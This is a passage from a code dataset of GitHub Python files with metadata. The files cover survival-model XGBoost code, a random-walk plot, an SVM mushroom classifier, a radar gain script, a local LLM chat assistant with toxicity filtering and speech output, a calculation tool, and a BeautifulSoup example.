separat validation set loss\n eval_set = [(X_train, y_train),(X_test, y_test)]\n #print('eval_set',eval_set)\n kwargs['eval_set'] = eval_set\n \n return super(XGBSurv, self).fit(X_train, y_train, **kwargs)\n else:\n X, y = self._sort_X_y(X,y)\n return super(XGBSurv, self).fit(X, y, **kwargs)\n \n # TODO: DataFrame Option\n def predict_cumulative_hazard_function(\n self, \n X_train: np.array,\n X_test: np.array,\n y_train: np.array,\n y_test: np.array, \n ) -> pd.DataFrame:\n \"\"\"Obtain cumulative hazard function from your model.\"\"\"\n if self.model_type:\n\n train_pred_hazards = super(XGBSurv, self).predict(X_train, output_margin=True)\n test_pred_hazards = super(XGBSurv, self).predict(X_test, output_margin=True)\n cum_hazard_predictions = pred_dict[str(self.model_type)](\n X_train, \n X_test, \n y_train, \n y_test,\n train_pred_hazards, \n test_pred_hazards\n )\n return cum_hazard_predictions\n else:\n raise NotImplementedError(\"Cumulative hazard not applicable to the model you provided.\")\n \n # TODO: add model condition\n def predict_survival_function(\n self, \n X_train: np.array, \n X_test: np.array,\n y_train: np.array, \n y_test: np.array):\n \"\"\"Obtain survival function from your model.\"\"\"\n \n X_train, y_train = self._sort_X_y(X_train, y_train)\n X_test, y_test = self._sort_X_y(X_test, y_test)\n df_cumulative_hazard = self.predict_cumulative_hazard_function(X_train, \n X_test, y_train, y_test)\n return np.exp(-df_cumulative_hazard)\n \n def get_loss_functions(self):\n \"\"\"Get implemented survival loss functions.\"\"\"\n return loss_dict\n \n def get_objective_functions(self):\n \"\"\"Get implemented survival objective functions.\"\"\"\n return objective_dict\n \n def _sort_X_y(self, X, y):\n \"\"\"Sort X, y data by absolute time.\"\"\"\n if isinstance(y, (pd.Series, pd.DataFrame)):\n y = y.values\n if not isinstance(y, np.ndarray):\n print('y error',y, type(y))\n raise ValueError(f'y is not numpy.ndarray. Got {type(y)}.')\n #new condition begin\n if y.ndim > 1:\n #print(\"Array has more than one dimension.\")\n # Check if the array has more than one column\n if y.shape[1] > 1:\n y_abs = y[:,0]\n else: \n y_abs = y.copy() \n y_abs = np.absolute(y_abs)\n #condition end\n #y_abs = np.absolute(y)\n if not np.all(np.diff(y_abs) >= 0):\n #print('Values are being sorted!')\n order = np.argsort(y_abs, kind=\"mergesort\")\n y = y[order]\n X = X[order]\n return X, y\n \n", "repo_name": "jatlantic/xgbsurv", "sub_path": "xgbsurv/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "xgbsurv.models.breslow_final.breslow_likelihood", "line_number": 25, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.efron_likelihood", "line_number": 26, "usage_type": "name"}, {"api_name": "xgbsurv.models.cind_final.cind_loss", "line_number": 27, "usage_type": "name"}, {"api_name": "xgbsurv.models.deephit_pycox_final.deephit_loss1_pycox", "line_number": 28, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.aft_likelihood", "line_number": 29, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.ah_likelihood", "line_number": 30, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.eh_likelihood", "line_number": 31, "usage_type": "name"}, {"api_name": "xgbsurv.models.breslow_final.breslow_objective", "line_number": 36, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.efron_objective", "line_number": 37, "usage_type": "name"}, {"api_name": "xgbsurv.models.cind_final.cind_objective", "line_number": 38, "usage_type": "name"}, {"api_name": "xgbsurv.models.deephit_pycox_final.deephit_pycox_objective", "line_number": 39, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.aft_objective", "line_number": 40, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.ah_objective", "line_number": 41, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.eh_objective", "line_number": 42, "usage_type": "name"}, {"api_name": "xgbsurv.models.breslow_final.get_cumulative_hazard_function_breslow", "line_number": 46, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.get_cumulative_hazard_function_efron", "line_number": 47, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.get_cumulative_hazard_function_aft", "line_number": 48, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.get_cumulative_hazard_function_ah", "line_number": 49, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.get_cumulative_hazard_function_eh", "line_number": 50, "usage_type": "name"}, {"api_name": "xgboost.XGBRegressor", "line_number": 53, "usage_type": "name"}, {"api_name": "xgbsurv.docstrings.xgbsurv_docstrings.get_xgbsurv_docstring", "line_number": 55, "usage_type": "call"}, {"api_name": "xgbsurv.docstrings.xgbsurv_docstrings.get_xgbsurv_fit_docstring", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 89, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 91, "usage_type": "attribute"}, {"api_name": "xgboost.XGBRegressor", "line_number": 98, "usage_type": "argument"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 121, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 127, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 183, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 213, "usage_type": "call"}]}
+{"seq_id": "38917339054", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rd\n\nclass RandomSEt:\n def __init__(self, count_of_points, max_distance) -> None:\n self.points = count_of_points\n self.max_walk = max_distance\n self.data = []\n \n def show(self):\n data = self.data\n X, Y, Z = [], [], []\n\n for (x, y, z) in data:\n X.append(x)\n Y.append(y)\n Z.append(z)\n X, Y, Z = np.array(X), np.array(Y), np.array(Z)\n axes_3d = plt.figure().add_subplot(projection=\"3d\")\n axes_3d.set_xlabel(\"X\")\n axes_3d.set_ylabel(\"Y\")\n axes_3d.set_zlabel(\"z\")\n axes_3d.scatter(X, Y, Z, c=Z, cmap=\"magma\", s=0.98)\n axes_3d.plot(X, Y, Z, color=\"black\", linewidth=0.23)\n plt.show()\n \n\n def random_set(self):\n data = []\n x_grid = [0]\n y_grid = [0]\n z_grid = [0]\n for elem in range(self.points):\n\n x_step = rd.randint(0, 100)\n x_direction = rd.choice([-1, 1])\n x = x_grid[-1] + x_step * x_direction\n\n y_step = rd.randint(0, 100)\n y_direction = rd.choice([-1, 1])\n y = y_grid[-1] + y_step * y_direction\n\n z_step = rd.randint(0, 100)\n z_direction = rd.choice([-1, 1])\n z = z_grid[-1] + z_step * z_direction\n\n x_grid.append(x)\n y_grid.append(y)\n z_grid.append(z)\n \n for core in zip(x_grid, y_grid, z_grid):\n data.append(core)\n \n data = np.array(data)\n self.data = data\n return data\n \n \"\"\"def generate_random_walk(self):\n x_grid = [rd.randint(0, 123)]\n y_grid = [rd.randint(0, 123)]\n z_grid = [rd.randint(0, 123)]\n\n for elem in range(self.points):\n tmp_list = []\n for core in range(self.max_walk):\"\"\"\n\n\n \nif __name__ == \"__main__\":\n new_object = RandomSEt(1000, 5)\n new_object.random_set()\n new_object.show()\n\n\n\n\n", "repo_name": "Asdergh/Projects", "sub_path": "lab_json_stat.py", "file_name": "lab_json_stat.py", "file_ext": "py", "file_size_in_byte": 2008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "36645795369", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 7 07:23:38 2020\r\n\r\n@author: Parshva Timbadia\r\n\"\"\"\r\n\r\n\r\n#IMPORTING LIBRARIES\r\n\r\nimport pandas as pd\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\n#IMPORT DATASET.\r\ncolnames = ['Class', 'cap-shape', 'cap-surface','cap-color', 'bruises',\r\n 'odor', 'gill-attachment', 'gill-spacing','gill-size', 'gill-color',\r\n 'stalk-shape', 'stalk-root', 'stalk-surface-above-ring', \r\n 'stalk-surface-below-ring','stalk-color-above-ring',\r\n 'stalk-color-below-ring' , 'veil-type', 'veil-color',\r\n 'ring-number', 'ring-type', 'spore-print-color',\r\n 'population', 'habitat']\r\ndataset= pd.read_csv(\"agaricus-lepiota.data\", names = colnames)\r\n\r\n\r\n# print(dataset.head())\r\n# print(len(dataset))\r\n\r\n#Replacing ? to NaN \r\ndataset=dataset.replace(['?'], np.nan)\r\n\r\n#Checking for the NULL values in the dataset.\r\ncheck_for_null =dataset.isnull().sum()\r\n# print(check_for_null)\r\n\r\n#After printinh we were able to see that there were missing values. \r\n\r\ndataset[colnames] =dataset[colnames].fillna(dataset.mode().iloc[0])\r\n\r\n# check_for_null =dataset.isnull().sum()\r\n# print(check_for_null)\r\n#We can see that the missing values get handled.\r\n\r\n# creating instance of labelencoder\r\nlabelencoder = LabelEncoder()\r\nfor i in colnames:\r\n dataset[i]=labelencoder.fit_transform(dataset[i])\r\n#Spliting dependent and Independent variables\r\n\r\n# print(dataset.head())\r\nx= dataset.iloc[:, 1:].values\r\ny= dataset.iloc[:, 0].values\r\n\r\n#Now we will seperate Training Data and Testing Data. Note: Random State helps to collect Dataset randomly for testing data.\r\nx_train, x_test , y_train , y_test = train_test_split(x, y, test_size=0.2)\r\n\r\n\r\n#Now using SVC object to train the data.\r\n\"\"\"\r\n\r\nNOTE: If you want accuracy to be more accurate like 1.0 for this dataset. Make the following changes in \r\nthe SVC model. \r\n\r\nkernel='poly'\r\ndegree=8 \r\n\r\nNOTE: As we have not included Randon_State to some value, everytime you run the algorithm, it will \r\nprovide different accuracy as it will select Training and Testing Data randomly. Howver, it always \r\ntouches 0.97 + in linear case.\r\n\r\n\"\"\"\r\nsvc_model=SVC(kernel='linear')\r\nsvc_model.fit(x_train, y_train)\r\n\r\n#Now making predictions. \r\n\r\ny_pred = svc_model.predict(x_test)\r\n\r\n#Testing Accuracy Now.\r\n\r\nprint(confusion_matrix(y_test,y_pred))\r\nprint(classification_report(y_test,y_pred))\r\nprint(\"Model Score :\", svc_model.score(x_test, y_test))\r\n\r\n\r\n\r\n", "repo_name": "ParshvaTimbadia/Artificial-Intelligence", "sub_path": "Week 5/PA!/svm2.py", "file_name": "svm2.py", "file_ext": "py", "file_size_in_byte": 2775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "27038320493", "text": "# AGC_gain -v.1.0\n\nimport argparse\nimport h5py\nimport numpy as np\n\nfrom gprMax.exceptions import CmdInputError\n\n# Parse command line arguments\nparser = argparse.ArgumentParser(description='create a new ouputfile gained by user defined type {constant, linear, exponential}')\nparser.add_argument('filename', help='base name of output file including path')\nparser.add_argument('gatelenght', help='lengh (ns) of the AGC time gate')\nargs = parser.parse_args()\n\nfilename = args.filename\noutputfile = args.filename.replace('.out', '_AGC.out')\n\n# Open filename and read some attributes\nf = h5py.File(filename, 'r')\nnrx = f.attrs['nrx']\niterations = f.attrs['Iterations']\ndt = f.attrs['dt']\n\n# Write new outputfile\nfg = h5py.File(outputfile, 'w')\nfg.attrs['Iterations'] = iterations\nfg.attrs['dt'] = dt\nfg.attrs['nrx'] = nrx\ntime = np.linspace(0, 1, iterations) * (iterations * dt)\n\n\n", "repo_name": "svedrine/Outdated-", "sub_path": "simon/AGC_gain.py", "file_name": "AGC_gain.py", "file_ext": "py", "file_size_in_byte": 875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "37275871287", "text": "import os\n\nfrom transformers import pipeline, AutoModelForCausalLM, AutoTokenizer\nimport torch\n\nimport detoxify\nimport nltk\n\nfrom bark import SAMPLE_RATE\nimport numpy\nfrom scipy.io.wavfile import write as write_wav\nfrom IPython.display import Audio\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n## Empty GPY cache\ntorch.cuda.empty_cache()\n\n# init env variables\n\nos.environ[\"SUNO_OFFLOAD_CPU\"] = \"True\"\nos.environ[\"SUNO_USE_SMALL_MODELS\"] = \"True\"\nos.environ[\"TRANSFORMERS_OFFLINE\"] = \"1\"\nos.environ[\"HF_DATASETS_OFFLINE\"] = \"1\"\n\n# init needed models\n\ncontext = \"You are an AI programming assistant, utilizing the Deepseek Coder model, developed by Deepseek Company, \\\nand you only answer questions related to computer science. For politically sensitive questions, \\\nsecurity and privacy issues, and other non-computer science questions, you will refuse to answer.\"\n\n\nmodel_name_or_path = \"TheBloke/deepseek-coder-1.3b-instruct-GPTQ\"\n\nmodel = AutoModelForCausalLM.from_pretrained(model_name_or_path,\n device_map=\"auto\",\n trust_remote_code=False,\n revision=\"main\",\n local_files_only=True).cuda()\n\nmodel.save_pretrained(\"./libs/saved/deepseeker\")\n\ntokenizer = AutoTokenizer.from_pretrained(model_name_or_path, use_fast=True, local_files_only=True)\ntokenizer.save_pretrained(\"./libs/saved/deepseeker\")\n\n# Defining the functions we will use\n\ndef detox(seq):\n results = detoxify.Detoxify('original-small', device='cuda').predict(seq)\n for k, v in results.items():\n if v > 0.1:\n return f\"Error: Sorry but your prompt/answer did not pass the {k} test.\"\n torch.cuda.empty_cache()\n return \"OK\"\n\ndef vocal_answer(answer):\n sentences = nltk.sent_tokenize(answer)\n VOICE = \"v2/en_speaker_6\"\n SILENCE = numpy.zeros((int(SAMPLE_RATE*0.25), 1), numpy.float32) #numpy array of silence for 0.25s\n pieces = [SILENCE]\n synthesiser = pipeline(\"text-to-speech\", \"suno/bark-small\")\n # Breaking the response into pieces to generate above 13 seconds\n for sentence in sentences:\n # will uncomment once the transformers library will be updated to contain this new voice_preset\n # Until then, we can't use the same voice for the answer\n # speech = synthesiser(sentence, forward_params={\"voice_preset\": VOICE, \"do_sample\": True, \"pad_token_id\": 0})\n speech = synthesiser(sentence, forward_params={\"do_sample\": True, \"pad_token_id\": 0})\n pieces += [speech['audio'].T, SILENCE]\n torch.cuda.empty_cache()\n final_speech = numpy.concatenate(pieces)\n write_wav(\"response.wav\", rate=speech[\"sampling_rate\"], data=final_speech)\n Audio(\"response.wav\")\n\ndef generate_format_output(prompt_template):\n pipe = pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n max_new_tokens=255,\n do_sample=True,\n temperature=0.7,\n top_p=0.1,\n top_k=35,\n repetition_penalty=1.1\n )\n output = pipe(prompt_template)[0]['generated_text']\n output = output.split(\"Response:\")[1]\n # output = output.split(\"\\n\")[0]\n torch.cuda.empty_cache()\n return output\n\ndef loop():\n sequence = \"\"\n while (sequence != \"exit\"):\n # Get prompt input\n sequence = input(\"You: \")\n if sequence == 'exit': break\n # Detox the input\n detox_response = detox(sequence)\n if detox_response != \"OK\":\n print(detox_response)\n continue\n # We accept the prompt\n prompt_template= f\"{context} ### Instruction: {sequence} ### Response:\"\n # generate the answer\n answer = generate_format_output(prompt_template)\n detox_response = detox(answer)\n if detox_response != \"OK\":\n print(detox_response)\n continue\n print(f\"Assistant: {answer}\")\n vocal_answer(answer)\n\n\nprint(\"\\n\\nWrite \\'exit\\' as a prompt to exit the program !\\n\\n\")\n\nloop()\n\n\n", "repo_name": "Tarekinh0/LeModel1", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "transformers.AutoModelForCausalLM.from_pretrained", "line_number": 36, "usage_type": "call"}, {"api_name": "transformers.AutoModelForCausalLM", "line_number": 36, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 44, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 44, "usage_type": "name"}, {"api_name": "detoxify.Detoxify", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 54, "usage_type": "attribute"}, {"api_name": "nltk.sent_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "bark.SAMPLE_RATE", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "transformers.pipeline", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 71, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 72, "usage_type": "call"}, {"api_name": "IPython.display.Audio", "line_number": 73, "usage_type": "call"}, {"api_name": "transformers.pipeline", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 90, "usage_type": "attribute"}]}
+{"seq_id": "10700831447", "text": "import argparse\nimport ast\nimport collections\nimport lib2to3\nimport lib2to3.fixes\nimport lib2to3.refactor\nimport math\nimport sys\nfrom collections.abc import Iterable\nfrom lib2to3 import fixer_base\n\nimport napkin.units\n\nCONTEXT = {\n # helpful\n 'undef': None,\n\n # math\n 'ceil': math.ceil,\n 'floor': math.floor,\n 'log': math.log,\n 'log2': math.log2,\n}\nCONTEXT.update(napkin.units.CONTEXT)\n\ndef is_variable_assignment(node):\n if not isinstance(node, ast.Assign):\n return False\n if node.targets[0].id != node.targets[0].id.upper():\n return False\n assert len(node.targets) == 1\n return True\n\ndef assigns_to(node):\n assert is_variable_assignment(node)\n return node.targets[0].id \n\ndef find_outputs(name):\n code = ast.parse(open(name).read())\n outputs = []\n for x in ast.walk(code):\n if not is_variable_assignment(x): continue\n outputs.append(assigns_to(x))\n context = CONTEXT.copy()\n exec(open(name).read(), context)\n return dict([(o, context[o]) for o in outputs])\n\ndef find_deps(name):\n code = ast.parse(open(name).read())\n deps = {}\n for x in ast.walk(code):\n if not is_variable_assignment(x): continue\n name = assigns_to(x)\n deps[name] = []\n for y in ast.walk(x):\n if isinstance(y, ast.Name) and y.id not in CONTEXT and y.id != name:\n deps[name].append(y.id)\n return deps\n\ndef transitive_closure(deps, name):\n out = [name]\n for n in deps[name]:\n out += transitive_closure(deps, n)\n return out\n\nVALID_UNITS = [\n 'bytes',\n 'bytes/sec',\n 'seconds',\n 'sigfig',\n 'percent',\n 'raw',\n]\n\ndef humanize_bytes(x):\n return napkin.units.humanize_metric(x, base=1024) + 'iB'\n\ndef humanize_bytes_sec(x):\n return humanize_bytes(x) + '/s'\n\ndef humanize_seconds(x, recurse=False):\n '''Turn a number into a string of the time\n\n >>> humanize_seconds(0)\n '0s'\n >>> humanize_seconds(60)\n '1m'\n >>> humanize_seconds(120)\n '2m'\n >>> humanize_seconds(128)\n '2m8s'\n >>> humanize_seconds(86400)\n '1d'\n >>> humanize_seconds(86401)\n '1d1s'\n\n >>> humanize_seconds(1.01)\n '1s10ms'\n >>> humanize_seconds(3.14159)\n '3s141ms589µs999ns'\n >>> humanize_seconds(51e-9)\n '51ns'\n '''\n for interval, unit in [(86400, 'd'), (3600, 'h'), (60, 'm'), (1, 's'),\n (1e-3, 'ms'), (1e-6, 'µs'), (1e-9, 'ns')]:\n if x >= interval:\n return '%d%s%s' % (x / interval, unit, humanize_seconds(x % interval, True))\n if recurse:\n return ''\n return '0s'\n\ndef humanize_sigfig(x):\n return '%1.2g' % x\n\ndef humanize_percent(x):\n return '%.1f%%' % (100 * x)\n\ndef humanize_raw(x):\n return str(x)\n\nclass Tool:\n\n def __init__(self, outputs):\n self.outputs = outputs\n\n def substitute(self, output, units=None):\n output = self.outputs[output]\n return self._substitute(output, units)\n\n def _substitute(self, output, units):\n if isinstance(output, Iterable):\n return '[' + ', '.join([self._substitute(x, units) for x in output]) + ']'\n if units is not None:\n units = {\n 'bytes/sec': 'bytes_sec'\n }.get(units, units)\n f = globals().get('humanize_' + units, None)\n assert f is not None, 'cannot find humanize_{}'.format(units)\n return f(output)\n if isinstance(output, bool):\n return 'True' if output else 'False'\n if isinstance(output, (float, int)):\n return napkin.units.humanize_metric(output)\n if output is None:\n return 'undefined'\n assert False\n\n def interpret_comment(self, text):\n text = text.strip(' #')\n if text == '': return None, ''\n if text in VALID_UNITS:\n return text, ''\n return None, ' # ' + text\n\ndef changes(filename, name):\n deps = find_deps(filename)\n return sorted(set(transitive_closure(deps, name)))\n\ndef is_changed_by(filename, name):\n outs = []\n deps = find_deps(filename)\n for output in deps.keys():\n if name == output:\n continue\n if name in transitive_closure(deps, output):\n outs.append(output)\n return sorted(set(outs))\n\ndef constants(filename):\n outputs = find_outputs(filename)\n deps = find_deps(filename)\n for o in outputs:\n if not deps[o]:\n yield o\n\ndef translate(filename):\n outputs = find_outputs(filename)\n rt = lib2to3.refactor.RefactoringTool(('napkin.substitute',), {'NAPKIN': Tool(outputs)})\n translated = (rt.refactor_string(open(filename).read(), filename))\n return str(translated).rstrip()\n\ndef main():\n parser = argparse.ArgumentParser(prog='napkin')\n # TODO(rescrv):\n # - allow sweeping a parameter\n parser.add_argument('--changes', metavar='V', type=str,\n help='what variables change the provided argument')\n parser.add_argument('--is-changed-by', metavar='V', type=str,\n help='what variables are changed by the provided argument')\n parser.add_argument('--constants', '-c', action='store_true',\n dest='constants', default=None,\n help='print all contants')\n parser.add_argument('input', help='input napkin filename')\n\n args = parser.parse_args()\n\n actions = [v for v in [\n args.changes,\n args.is_changed_by,\n args.constants,\n ] if v is not None]\n if len(actions) > 1:\n print('provided too many different actions', file=sys.stderr)\n sys.exit(1)\n\n if args.changes:\n for x in changes(args.input, args.changes):\n print(x)\n if args.is_changed_by:\n c = constants(args.input)\n for x in is_changed_by(args.input, args.is_changed_by):\n print(x)\n if args.constants:\n for c in sorted(constants(args.input)):\n print(c)\n if len(actions) == 0:\n print(translate(args.input).rstrip())\n\nif __name__ == '__main__':\n main()\n", "repo_name": "rescrv/napkin", "sub_path": "napkin/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 5997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "math.ceil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 21, "usage_type": "attribute"}, {"api_name": "math.log2", "line_number": 22, "usage_type": "attribute"}, {"api_name": "napkin.units.units", "line_number": 24, "usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 24, "usage_type": "name"}, {"api_name": "ast.Assign", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ast.parse", "line_number": 39, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "ast.parse", "line_number": 49, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 51, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 55, "usage_type": "call"}, {"api_name": "ast.Name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "napkin.units.units.humanize_metric", "line_number": 76, "usage_type": "call"}, {"api_name": "napkin.units.units", "line_number": 76, "usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 76, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 131, "usage_type": "argument"}, {"api_name": "napkin.units.units.humanize_metric", "line_number": 143, "usage_type": "call"}, {"api_name": "napkin.units.units", "line_number": 143, "usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 143, "usage_type": "name"}, {"api_name": "lib2to3.refactor.RefactoringTool", "line_number": 178, "usage_type": "call"}, {"api_name": "lib2to3.refactor", "line_number": 178, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 203, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}]}
+{"seq_id": "13926380947", "text": "from bs4 import BeautifulSoup\n\ndef get_context(path):\n with open(path, 'r') as file:\n return file.read()\n\nif __name__ == '__main__':\n content = get_context('..\\\\requests\\\\econpy.html')\n bs = BeautifulSoup(content, 'html.parser')\n div = bs.find('div', {'title':'buyer-info' })\n div['id'] = 'I0001'\n div['title'] = 'buyer-data'\n div.div.string = 'Gabriel A'\n div.span.string = '35.89'\n print(div)", "repo_name": "gabriel-acuna/web-scraping", "sub_path": "3.changing_dom/1.-modify element.py", "file_name": "1.-modify element.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}]}
